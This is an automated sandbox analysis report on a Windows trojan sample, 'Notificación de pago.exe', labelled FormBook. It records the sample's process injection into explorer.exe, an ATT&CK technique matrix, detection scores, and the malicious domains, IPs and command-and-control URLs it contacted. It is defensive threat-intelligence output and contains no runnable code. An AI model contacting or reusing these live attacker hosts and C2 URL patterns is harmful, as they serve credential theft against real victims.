          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information


          Remote Access Functionality

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 1 Shared Modules | Path Interception | 612 Process Injection | 1 Masquerading | OS Credential Dumping | 221 Security Software Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 1 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 31 Virtualization/Sandbox Evasion | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 612 Process Injection | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 12 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 112 System Information Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | 4 Obfuscated Files or Information | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | 23 Software Packing | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 File Deletion | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Behavior Graph
          ID: 626150, Sample: Notificaci#U00f3n de pago.exe, Startdate: 13/05/2022, Architecture: WINDOWS, Score: 100
          Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 8 other signatures
          DNS/IP: www.triptoasiam.com; www.massage-rino.com

          Notificaci#U00f3n de pago.exe (started)
            dropped: C:\...\Notificaci#U00f3n de pago.exe.log, ASCII
            signature: Injects a PE file into a foreign processes
            -> Notificaci#U00f3n de pago.exe (started)
                 signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                 -> explorer.exe (injected)
                      DNS/IP: www.librevillegabon.com 104.195.7.239, 49764, 80 ESITEDUS United States; theguiriguide.com 192.0.78.25, 49761, 80 AUTOMATTICUS United States; 4 other IPs or domains
                      signature: System process connects to network (likely due to code injection or exploit)
                      -> WWAHost.exe (started)
                           signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                           -> cmd.exe (started)
                                -> conhost.exe (started)

          Source | Detection | Scanner | Label
          Notificaci#U00f3n de pago.exe | 21% | Virustotal |
          Notificaci#U00f3n de pago.exe | 41% | ReversingLabs | ByteCode-MSIL.Trojan.FormBook
          Notificaci#U00f3n de pago.exe | 100% | Joe Sandbox ML |

          No Antivirus matches

          Source | Detection | Scanner | Label
          8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Source | Detection | Scanner | Label
          www.massage-rino.com | 0% | Virustotal |
          theguiriguide.com | 0% | Virustotal |

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.triptoasiam.com | 162.0.216.71 | true | false | | unknown
          www.massage-rino.com | 38.40.251.97 | true | false | | unknown
          theguiriguide.com | 192.0.78.25 | true | true | | unknown
          parkingpage.namecheap.com | 198.54.117.212 | true | false | | high
          www.librevillegabon.com | 104.195.7.239 | true | true | | unknown
          www.theguiriguide.com | unknown | unknown | true | | unknown
          www.team-ctctitleco.com | unknown | unknown | true | | unknown
          www.evertribute.com | unknown | unknown | true | | unknown

          Name | Malicious | Antivirus Detection | Reputation
          http://www.evertribute.com/d6fp/?7nxh=0IAMhpyfM6TyxYvNuQBLxFd+VBe1OVp7bFg/8SsVn3OL4Z0v7SAtnQzd8ZWN+7APMfoM&q6AlF=0txdQnwxgb | true | Avira URL Cloud: safe | unknown
          http://www.librevillegabon.com/d6fp/?7nxh=27dTALvGagYo6W4eiFO6YvZJ//Zn5pBdCa2l5DH7HNM2RGs4GWZbOB9vu5aCQaLmGkAl&q6AlF=0txdQnwxgb | true | Avira URL Cloud: safe | unknown
          http://www.theguiriguide.com/d6fp/?7nxh=Vjw903Y9bM1AKbFW1pqe+tE50cefuwUzuT8QLR39Zk9vkX5o4NYForbp6qTr1jJAF4yG&q6AlF=0txdQnwxgb | true | Avira URL Cloud: safe | unknown
          www.hkqhdq.com/d6fp/ | true | Avira URL Cloud: safe | low

          Name | Source | Malicious | Antivirus Detection | Reputation
00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267071973.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.sajatypeworks.comNotificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 
00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263447229.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.typography.netDNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.founder.com.cn/cn/cTheNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.galapagosdesign.com/staff/dennis.htmNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://fontfabrik.comNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.galapagosdesign.com/nNotificaci#U00f3n de pago.exe, 00000000.00000003.277842098.0000000005FC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.fontbureau.comB.TTF?mNotificaci#U00f3n de pago.exe, 00000000.00000003.283274028.0000000005F9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.jiyu-kobo.co.jp/Y0?mNotificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.jiyu-kobo.co.jp/hm?Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.fontbureau.comcomNotificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.galapagosdesign.com/DPleaseNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.jiyu-kobo.co.jp/6mNotificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.jiyu-kobo.co.jp/Y0Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fonts.comNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.sandoll.co.krNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.urwpp.deDPleaseNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.zhongyicts.com.cnNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.sajatypeworks.comeNotificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 
00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267071973.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.sakkal.comNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com.TTFNotificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.apache.org/licenses/LICENSE-2.0Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.fontbureau.comNotificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.sajatypeworks.comtNotificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 
00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267071973.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.sajatypeworks.comt-bhNotificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 
00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263447229.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/ZmNotificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/jp/Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.comaNotificaci#U00f3n de pago.exe, 00000000.00000003.283274028.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000002.312759063.0000000005F90000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.307819527.0000000005F90000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.como)mNotificaci#U00f3n de pago.exe, 00000000.00000003.283274028.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000002.312759063.0000000005F90000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.307819527.0000000005F90000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      low
                                      http://www.fontbureau.comdNotificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://en.wNotificaci#U00f3n de pago.exe, 00000000.00000003.263896171.0000000005F96000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/)mNotificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.carterandcone.comlNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers/cabarga.htmlNNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.founder.com.cn/cnNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266184528.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266049177.0000000005F98000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265980144.0000000005F97000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers/frere-jones.htmlNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.founder.com.cn/cnntNotificaci#U00f3n de pago.exe, 00000000.00000003.265980144.0000000005F97000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/DmNotificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.galapagosdesign.com/2Notificaci#U00f3n de pago.exe, 00000000.00000003.277842098.0000000005FC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/cm6Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/qm(Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.founder.com.cn/cne-dioNotificaci#U00f3n de pago.exe, 00000000.00000003.266184528.0000000005F97000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.fontbureau.commNotificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers8Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
